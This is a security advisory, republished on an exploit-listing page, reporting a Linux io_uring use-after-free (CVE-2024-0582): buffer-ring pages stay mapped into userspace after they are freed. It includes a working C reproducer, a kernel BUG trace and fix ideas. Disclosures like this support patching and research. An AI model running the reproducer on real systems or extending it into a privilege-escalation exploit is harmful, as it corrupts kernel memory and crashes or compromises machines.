Share
## https://sploitus.com/exploit?id=PACKETSTORM:189864
Since commit c56e022c0a27 ("io_uring: add support for user mapped provided buffer ring"), landed in Linux 6.4, io_uring makes it possible to allocate, mmap, and deallocate "buffer rings".
    
    A "buffer ring" can be allocated with io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...). It can be mapped into userspace using mmap() with offset IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM subsystem will treat the mapping as a set of opaque page frame numbers not associated with any corresponding pages; this implies that the calling code is responsible for ensuring that the mapped memory can not be freed before the userspace mapping is removed.
    
    However, there is no mechanism to ensure this in io_uring: It is possible to just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free pages mapped into userspace, which is a fairly easily exploitable situation.
    
    reproducer:
    
    #define _GNU_SOURCE  
    #include <unistd.h>  
    #include <err.h>  
    #include <string.h>  
    #include <stdio.h>  
    #include <ctype.h>  
    #include <sys/syscall.h>  
    #include <sys/mman.h>  
    #include <linux/io_uring.h>  
      
    #define SYSCHK(x) ({          \  
      typeof(x) __res = (x);      \  
      if (__res == (typeof(x))-1) \  
        err(1, "SYSCHK(" #x ")"); \  
      __res;                      \  
    })  
      
    int main(void) {  
      struct io_uring_params params = {  
        .flags = IORING_SETUP_NO_SQARRAY  
      };  
      int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));  
      printf("uring_fd = %d\n", uring_fd);  
      
      struct io_uring_buf_reg reg = {  
        .ring_entries = 1,  
        .bgid = 0,  
        .flags = IOU_PBUF_RING_MMAP  
      };  
      SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));  
      
      void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));  
      printf("pbuf mapped at %p\n", pbuf_mapping);  
      
      struct io_uring_buf_reg unreg = { .bgid = 0 };  
      SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));  
      while (1) {  
        memset(pbuf_mapping, 0xaa, 0x1000);  
        usleep(100000);  
      }  
    }  
    
    When run on a system with the debug options:
    
        CONFIG_PAGE_TABLE_CHECK=y  
        CONFIG_PAGE_TABLE_CHECK_ENFORCED=y
    
    , this will splat with the following error, when __page_table_check_zero() detects that a page that's being freed is still mapped into userspace:
    
    ------------[ cut here ]------------  
    kernel BUG at mm/page_table_check.c:146!  
    invalid opcode: 0000 [#1] PREEMPT SMP KASAN  
    CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360  
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014  
    RIP: 0010:__page_table_check_zero+0x136/0x150  
    Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff  
    RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202  
    RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000  
    RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4  
    RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e  
    R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000  
    R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000  
    FS:  00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000  
    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
    CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0  
    PKRU: 55555554  
    Call Trace:  
     <TASK>  
    [...]  
     free_unref_page_prepare+0x282/0x450  
     free_unref_page+0x45/0x170  
     __io_remove_buffers.part.0+0x38c/0x3c0  
     io_unregister_pbuf_ring+0x146/0x1e0  
    [...]  
     __do_sys_io_uring_register+0xa03/0x11c0  
    [...]  
     do_syscall_64+0x43/0xf0  
     entry_SYSCALL_64_after_hwframe+0x6e/0x76  
    RIP: 0033:0x7f745ef4bf59  
    Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48  
    RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab  
    RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59  
    RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003  
    RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000  
    R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0  
    R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000  
     </TASK>  
    Modules linked in:  
    ---[ end trace 0000000000000000 ]---  
    
    When run on a system without those options, this reproducer will randomly corrupt memory and probably on most runs crash the machine.
    I tried it once and after I tried using some other programs, I got some random kernel #GP fault.
    
    One way to fix this might be to add some mapping counter to struct io_buffer_list, and then:
    
        increment that counter in io_uring_validate_mmap_request() for PBUF_RING mappings
        increment that counter in the vm_area_operations ->open() handler
        decrement that counter in the vm_area_operations ->close() handler
        refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?
    
    Or alternatively free the io_buffer_list when the counter drops to zero, and let the counter start at 1.
    
    (I'm not sure what the lifetime rules for other accesses to the io_buffer_list's memory are - it looks like most paths only access the io_buffer_list under some lock? Is the idea that the kernel actually accesses the buffer through userspace pointers, or something like that? I'll have to stare at this some more before I understand it...)
    
    This bug is subject to a 90-day disclosure deadline. If a fix for this
    issue is made available to users before the end of the 90-day deadline,
    this bug report will become public 30 days after the fix was made
    available. Otherwise, this bug report will become public at the deadline.
    The scheduled deadline is 2024-02-26.
    
    
    Related CVE Number: CVE-2024-0582
    
    Credit: Jann Horn